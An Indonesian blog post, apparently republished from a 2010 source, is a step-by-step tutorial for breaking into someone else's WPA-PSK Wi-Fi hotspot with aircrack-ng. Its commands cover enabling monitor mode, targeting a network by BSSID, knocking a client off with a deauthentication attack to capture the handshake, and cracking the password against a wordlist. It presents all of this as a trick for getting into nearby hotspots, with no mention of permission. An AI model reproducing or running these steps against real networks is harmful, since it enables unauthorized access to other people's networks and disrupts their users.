Ada berbagai macam cara untuk menjebol/bobol hotspot suatu area tertentu dengan cukup mudah. Dari sini akan mencoba share sedikit sekaligus memberi penejelasan bagaimana sih cara
membobol password hotspot yang bertipe wpa-psk dengan mudah.
Cara
ini bisa menggunakan linux backtrack 4 dinal release atau linux apapun
tertama asal sudah terinstall aplikasi aircrack-ng. Langsung aja ya :
sudo apt-get install aircrack-ng
* Kedua, masuk ke dekstop dengan perintah ~# startx (untuk yang make backtrack)
* Ketiga, buka konsole (terminal) dan ketikkan perintah untuk melihat interface device yang ada
sudo su
ifconfig -a
* Keempat, ketikkan perintah di bawah untuk mengaktifkan interface wlan0
ifconfig wlan0 up
* Kelima,
sekarang gunakan aplikasi airmon-ng untuk airmon-ng membuat virtual
interface mode monitor dengan mengetikkan perintah di bawah.
airmon-ng start wlan0
* Keenam, monitorlah jaringan di sekitar kamu. Caranya ketiklah perintah ini.
airodump-ng mon0
catatan : mon0 adalah interface virtual hasil dari airmon-ng tadi.
* Ketujuh, fokuskan monitoring jaringan hotspot yang ingin kita bobol passwordnya. Ketik lagi perintah berikut.
airodump-ng -w coba –channel 11 –bssid 001122334455 mon0
ket:
memonitoring khusus jaringan yang memiliki bssid 00:11:22:33:44:55
pada channel 11 dan hasil dari monitoring di tulis pada file yang
bernama ‘coba’
Selanjutnya,
gunakan serangan dengan cara disconnect salah satu client untuk
mendapatkan paket handshake yang dibutuhkan untuk proses cracking
aireplay-ng -0 1 -a 001122334455 -c oo1cbfa13fe3 mon0
ket:
aireplay-ng digunakan untuk mendisconnect salah satu client yaitu
00:1C:BF:A1:3F:E3 untuk mendapatkan paket handshake yang dibutuhkan
untuk proses cracking
-0 : mode serangan deAuthentication
1 : dilakukan sebanyak 1x deAuth
* Terakhir,
setelah mendapatkan paket handshake, selanjutnya adalah proses
cracking dengan menggunakan aircrack dan file password dengan existensi
.lst atau .txt dengan perintah
aircrack-ng coba*.cap -w /pentest/passwords/wordlists/listpass.txt
Keterangan :
- listpass.txt adalah file password yang saya buat sendiri dan terletak pada /pentest/passwords/wordlists/listpass.txt
Keberhasilan proses cracking tergantung ada tidaknya password yang ada
di list password dengan password yang sebenarnya. Jika password yang
digunakan pada jaringan tersebut ada di list password maka proses
cracking akan berhasil dan jika password list yang kita miliki tidak
mencatat password yang digunakan pada jaringan tersebut kemungkinan
keberhasilan proses cracking akan gagal.
Selamat menjajal trik di atas, mudah-mudahan tembus, biar aman pake sabut kelapa aja biar prampet......
See U again next post.
Sumber : http://kluwanbacktrack.blogspot.com/2010/04/tutorial-cara-cracking-bobol-password.html